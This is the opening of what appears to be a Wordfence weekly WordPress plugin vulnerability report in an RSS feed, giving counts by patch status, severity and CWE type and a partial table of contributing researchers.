										<content:encoded><![CDATA[<p>Last week, there were 260 vulnerabilities disclosed in 207 WordPress Plugins that have been added to the Wordfence Intelligence Vulnerability Database, and there were 147 Vulnerability Researchers that contributed to WordPress Security last week. <b>Review those vulnerabilities in this report now to ensure your site is not affected.</b></p>
<p>Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data<strong> to implement layered security, aligning with our overarching mission to secure WordPress with defense in depth strategies.</strong> That is why the Wordfence Intelligence <a href="https://www.wordfence.com/threat-intel/" target="_blank" rel="noopener">user interface</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability API</a>, and <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> are all completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report. As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">world’s leading quality vulnerability database</a> provider for WordPress, site owners can rest assured knowing Wordfence has their back.</p>
<p>Enterprises, Hosting Providers, and even Individuals can utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability Database API</a> to receive a complete dump of our <strong>database of over 40,000 vulnerabilities</strong> and then utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> to stay on top of the newest vulnerabilities added in real-time, as well as any updates made to the database, <strong>all for free</strong>.</p>
<p><em><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</em></p>
<hr>
<h3>Total Unpatched &amp; Patched Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table patched-status">
<tr>
<th class="text-center w-50">Patch Status</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Patched</td>
<td class="total text-center">217</td>
</tr>
<tr>
<td class="text-center">Partially Patched</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td class="text-center">Unpatched</td>
<td class="total text-center">42</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CVSS Severity Last Week</h3>
</p>
<table class="wfvr-list-table cvss-counts">
<tr>
<th class="text-center w-50">Severity Rating</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Medium Severity</td>
<td class="total text-center">184</td>
</tr>
<tr>
<td class="text-center">High Severity</td>
<td class="total text-center">66</td>
</tr>
<tr>
<td class="text-center">Critical Severity</td>
<td class="total text-center">10</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CWE Type Last Week</h3>
</p>
<table class="wfvr-list-table cwe-counts">
<tr>
<th class="text-center w-50">Vulnerability Type by CWE</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>Improper Neutralization of Input During Web Page Generation (&#8216;Cross-site Scripting&#8217;)</td>
<td class="total text-center">66</td>
</tr>
<tr>
<td>Missing Authorization</td>
<td class="total text-center">58</td>
</tr>
<tr>
<td>Exposure of Sensitive Information to an Unauthorized Actor</td>
<td class="total text-center">21</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)</td>
<td class="total text-center">18</td>
</tr>
<tr>
<td>Improper Privilege Management</td>
<td class="total text-center">15</td>
</tr>
<tr>
<td>Authorization Bypass Through User-Controlled Key</td>
<td class="total text-center">13</td>
</tr>
<tr>
<td>Improper Limitation of a Pathname to a Restricted Directory (&#8216;Path Traversal&#8217;)</td>
<td class="total text-center">11</td>
</tr>
<tr>
<td>Deserialization of Untrusted Data</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>Improper Control of Generation of Code (&#8216;Code Injection&#8217;)</td>
<td class="total text-center">9</td>
</tr>
<tr>
<td>Improper Authentication</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>Unrestricted Upload of File with Dangerous Type</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>Client-Side Enforcement of Server-Side Security</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Cross-Site Request Forgery (CSRF)</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Improper Control of Filename for Include/Require Statement in PHP Program (&#8216;PHP Remote File Inclusion&#8217;)</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Insufficient Verification of Data Authenticity</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Protection Mechanism Failure</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>URL Redirection to Untrusted Site (&#8216;Open Redirect&#8217;)</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Authentication Bypass Using an Alternate Path or Channel</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Guessable CAPTCHA</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements in Output Used by a Downstream Component (&#8216;Injection&#8217;)</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Incorrect Authorization</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Missing Authentication for Critical Function</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Server-Side Request Forgery (SSRF)</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Uncontrolled Resource Consumption</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Unverified Password Change</td>
<td class="total text-center">1</td>
</tr>
</table>
<hr>
<h3><a></a>Researchers That Contributed to WordPress Security Last Week</h3>
</p>
<table class="wfvr-list-table researcher-list">
<tr>
<th class="text-center w-50">Researcher Name</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a>
				</div>
</p></div>
</td>
<td class="total text-center">25</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a>
				</div>
</p></div>
</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a>
				</div>
</p></div>
</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a>
				</div>
</p></div>
</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/aaf374001487ef75a3024e689e8db54a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aaf374001487ef75a3024e689e8db54a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener">0xBassia</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bb525902f3ac5c4bbe1c6fb9fa9a0b4d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bb525902f3ac5c4bbe1c6fb9fa9a0b4d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener">Philipp Doblhofer</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener">Peng Zhou</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6dd380c38e13e8dc02631e8ea879a9e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6dd380c38e13e8dc02631e8ea879a9e4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener">benzdeus</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/14d108451720dcd5393c98321cf438a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="14d108451720dcd5393c98321cf438a8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ali-mousavi" target="_blank" rel="noopener">Ali Mousavi</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/67bc41ac47fddf33cd4e0ced70562b21.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="67bc41ac47fddf33cd4e0ced70562b21"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener">Kuba</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ff958e29920c1592e3f93275db2c8014.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ff958e29920c1592e3f93275db2c8014"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/m1w34p0n" target="_blank" rel="noopener">m1w34p0n</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/429c3eb56bea605e95a57ae93ae24c62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="429c3eb56bea605e95a57ae93ae24c62"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener">Nguyen Ba Khanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">Yuto Hyakumoto</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8e196345806e141d3c31b5b5d8489ec0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e196345806e141d3c31b5b5d8489ec0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongwon-lee" target="_blank" rel="noopener">Seongwon Lee</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8f2147d3a162aeba1f2416afc4c0274c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f2147d3a162aeba1f2416afc4c0274c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener">Abdullah Kareem</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2b7e2a8d4c137f1479be4362c52fd452.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2b7e2a8d4c137f1479be4362c52fd452"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener">dodoh4t</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8dae08eb7d527264fd4e9c97ea820971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8dae08eb7d527264fd4e9c97ea820971"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener">andrea bocchetti</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4b15dda37cd16c042771958e3983fb62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b15dda37cd16c042771958e3983fb62"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/baptoutatis" target="_blank" rel="noopener">BaptouTatis</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/12033157b67df90c715a01b49cea314d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="12033157b67df90c715a01b49cea314d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/myungyong-lee" target="_blank" rel="noopener">MYUNGYONG LEE</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3418ad4ee805983c98090703f44c49d2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3418ad4ee805983c98090703f44c49d2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nobody-2" target="_blank" rel="noopener">nobody</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4240823195d4b265f3cd4ca5947a5e1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4240823195d4b265f3cd4ca5947a5e1c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener">Adam Rayyan Aryasatya</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0835cd406574e6e3583506c980d8cf19.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0835cd406574e6e3583506c980d8cf19"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-anh-quan-prototw" target="_blank" rel="noopener">Nguyen Anh Quan (prototw)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0412e840e77b2936441bafa1347ba51a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0412e840e77b2936441bafa1347ba51a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arif-shaikh" target="_blank" rel="noopener">Arif Shaikh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e0d316069f277a0a76ff8d9e3c1df612.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0d316069f277a0a76ff8d9e3c1df612"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/care" target="_blank" rel="noopener">care</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/89395cfd0f3a74596c20f9baaa5f98a7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="89395cfd0f3a74596c20f9baaa5f98a7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sandeep-v-2" target="_blank" rel="noopener">Sandeep V</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/08c56aeab3dde56e4b6b7bbd8a05592b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="08c56aeab3dde56e4b6b7bbd8a05592b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/krypt3d" target="_blank" rel="noopener">Krypt3d</a>
